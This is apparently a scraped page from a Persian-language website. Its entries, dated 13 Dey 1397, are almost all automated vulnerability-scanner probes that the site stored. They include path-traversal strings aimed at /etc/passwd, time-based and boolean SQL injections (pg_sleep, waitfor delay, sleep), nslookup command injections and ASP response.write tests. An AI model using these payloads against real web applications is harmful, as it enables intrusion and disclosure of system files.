././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././. 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd 13 دی 1397

1


${9999328+9999496} 13 دی 1397

1


../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd 13 دی 1397

1


1 13 دی 1397

1


/.././.././.././.././.././.././.././../etc/./passwd%00 13 دی 1397

1


1 13 دی 1397

1


%2fetc%2fpasswd 13 دی 1397

1


1 13 دی 1397

1


/etc/passwd 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd 13 دی 1397

1


1 13 دی 1397

1


/../..//../..//../..//../..//../..//etc/passwd.jpg 13 دی 1397

1


..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg 13 دی 1397

1


1 13 دی 1397

1


../../../../../../../../../../etc/passwd.jpg 13 دی 1397

1


6gKCCqU3'));select pg_sleep(6); -- 13 دی 1397

1


AS716DW0');select pg_sleep(3); -- 13 دی 1397

1


..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg 13 دی 1397

1


../../../../../../../../../../../../../../../proc/version 13 دی 1397

1


RjlUCXkO';select pg_sleep(3); -- 13 دی 1397

1


../../../../../../../../../../etc/passwd 13 دی 1397

1


-1));select pg_sleep(9); -- 13 دی 1397

1


-1);select pg_sleep(9); -- 13 دی 1397

1


1 13 دی 1397

&nslookup g0F0igZL&'\"`0&nslookup g0F0igZL&`'


-1;select pg_sleep(9); -- 13 دی 1397

1


1 13 دی 1397

$(nslookup m0Ur6NQk)


J24gRf4H'; waitfor delay '0:0:6' -- 13 دی 1397

1


1 13 دی 1397

1


-1); waitfor delay '0:0:6' -- 13 دی 1397

1


1 13 دی 1397

set|set&set


1 13 دی 1397

VaCnyLcC


1 waitfor delay '0:0:6' -- 13 دی 1397

1


1 13 دی 1397

1


1L9nGI3m 13 دی 1397

1


-1; waitfor delay '0:0:3' -- 13 دی 1397

1


(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/ 13 دی 1397

1


1 13 دی 1397

1


if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/ 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

"+response.write(9528981*9268798)+"


1 13 دی 1397

'+response.write(9528981*9268798)+'


&nslookup wyM5bZRN&'\"`0&nslookup wyM5bZRN&`' 13 دی 1397

1


-1" OR 2+927-927-1=0+0+0+1 -- 13 دی 1397

1


1 13 دی 1397

response.write(9528981*9268798)


$(nslookup QfsSMFnp) 13 دی 1397

1


-1' OR 2+827-827-1=0+0+0+1 or 'mz7rcNgx'=' 13 دی 1397

1


-1' OR 2+41-41-1=0+0+0+1 -- 13 دی 1397

1


-1 OR 2+713-713-1=0+0+0+1 13 دی 1397

1


1 13 دی 1397

1


set|set&set 13 دی 1397

1


-1 OR 2+716-716-1=0+0+0+1 -- 13 دی 1397

1


1 13 دی 1397

1


"+response.write(9641068*9237795)+" 13 دی 1397

1


k0aTMPgu 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


'+response.write(9641068*9237795)+' 13 دی 1397

1


response.write(9641068*9237795) 13 دی 1397

1


1 13 دی 1397

1


مقالات ویژه
آرشیو


مقالات پربازدید
آرشیو


آخرین مقالات
آرشیو


بازدید امروز: 1534

بازدید هفته: 6639

بازدید ماه: 34509

کلیه حقوق سایت متعلق به مدیر سایت میباشد.